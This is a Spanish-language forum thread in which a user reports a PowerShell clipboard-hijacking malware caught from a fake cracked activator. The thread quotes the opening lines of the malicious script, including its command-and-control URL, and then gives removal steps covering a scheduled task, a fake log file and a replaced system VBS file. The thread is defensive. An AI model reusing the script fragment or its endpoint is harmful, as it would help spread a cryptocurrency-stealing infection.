Eliminar Malware que hace uso de Powershell al inicio del sistema

NextNext333 · 21 Abril, 2022 13:15

Hola, buenas tardes.

Estoy bastante seguro de que mi PC está infectado por el script de PowerShell mencionado en:

gist.github.com

https://gist.github.com/infernoboy/cf114fda56ff3706478e0d1e6a1a1b27

danger.ps1

$scriptItem = Get-Item -Path $MyInvocation.MyCommand.Path;
$OS_Major = [System.Environment]::OSVersion.Version.Major.ToString() + "." + [System.Environment]::OSVersion.Version.Minor.ToString();
$EndPointURL = "http://api.private-chatting.com/connect";
$__Version__ = "M_37";
[string]$WorkerEnHandle = [Guid]::NewGuid().ToString();
[System.Threading.EventWaitHandle]$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset, $WorkerEnHandle);

function XF3a8JO3r5r8G([string] $str) {
    return [System.Environment]::ExpandEnvironmentVariables("%" + $str + "%")
}

This file has been truncated. show original

Probablemente el PC se infectó después de ejecutar el siguiente parche supuestamente llamado Team-CrackerFG - Activator:

Patch.BackupTrans

En segundo plano, cada vez que enciendo el ordenador, se ejecutan 2 procesos PowerShell.exe que detengo lo más rápido posible. La parte buena de todo esto es que, en principio, el script no puede enviar información fuera de mi ordenador porque tengo configurado el antivirus ESET en modo interactivo y cada vez que detecta una nueva conexión entrante o saliente, me da la opción de permitirla o bloquearla.

Gracias a eso es como detecté la infección, ya que vi que poco después de ejecutar ese patch, ESET me mostró una conexión saliente cuya URL era http://api.private-chatting.com/connect originada desde un proceso PowerShell.exe, me pareció muy sospechosa y la bloqueé. Así que creo que estoy a salvo, pero quiero eliminar este malware por completo, por supuesto, algo que no he logrado hasta ahora.

Supervisando el Visor de Eventos de Windows, he visto que al inicio del sistema ocurren algunos eventos de PowerShell (también he generado un archivo .EVTX que puedo adjuntarlo si es necesario):

También comentar que parece ser un malware bastante reciente y ningún antivirus lo detecta de momento. Es más, antes de ejectuar el supuesto activador, lo subí a VirusTotal y no hubo ninguna detección, por eso es por lo que pensaba que era seguro, pero parece ser que no.

He escaneado mi PC con MalwareBytes pero no encuentra nada. Estoy abierto a facilitarlos los LOGs que necesitéis, por supuesto.

Muchas gracias de antemano, estamos en contacto.

PD: A continuación dejo las capturas del Visor de Eventos:

NextNext333 · 22 Abril, 2022 17:47

Buenas tardes. Me respondo a mí mismo para comentar cómo se elimina este malware, ya que el usuario que destapó este script en el Gist de Github que enlacé al principio del 1er mensaje me ha dicho los pasos que hay que seguir para eliminarlo:

Abrir el Programador de Tareas
Nos metemos en Microsoft > Windows > NetService > Network y ahí veremos que hay una tarea creada. Esa tarea es la que lanza los procesos PowerShell de este malware.
Se puede eliminar la carpeta NetService completamente, ya que fue creada por el malware (para ello antes hay que eliminar la tarea en sí misma, y ya después la carpeta NetService).
Además, hay que eliminar un archivo LOG falso que también generó el malware, que es donde se esconde el script: C:\Windows\logs\system-logs.txt
El malware también reemplaza el contenido de C:\Windows\System32\SyncAppvPublishingServer.vbs con su propia versión, así que hay que regenerar ese archivo. Probablemente ejecutando el comando sfc /scannow, se detecten archivos corruptos del sistema y Windows los reemplace con la versión original automáticamente. Se puede saber porque el checksum MD5 del archivo original en Windows 10 Pro es: 20C4FE2B130D9F0C92D7629E71AFBB66. Para Windows 11 el compi de GitHub ha subido una copia del archivo original en el siguiente enlace: Copied from a clean install of Windows 11 · GitHub

Y eso es todo.

Aparentemente, el malware lo que hace es monitorizar el portapapeles en busca de una dirección de criptomonedas. Una vez encuentra una, la reemplaza por una dirección que pertenece a los estafadores con la esperanza de que, al pegarla el usuario, no se dé cuenta. Si pasa eso, es decir, si el usuario no se da cuenta, al enviar el dinero lo estaría enviando a la dirección de los estafadores en lugar de a la que quería enviarlo realmente. Aparte de eso, no parece que envíe ninguna otra información personal. Las dirección de criptomoneda que usa el malware han estafado ya más de 3 millones de dólares! Increíble.

Así que tened mucho cuidado y siempre revisad la dirección cuando la peguéis, por si acaso.

system · 24 Abril, 2022 17:48

Este tema se cerró automáticamente 2 días después de la última publicación. No se permiten nuevas respuestas.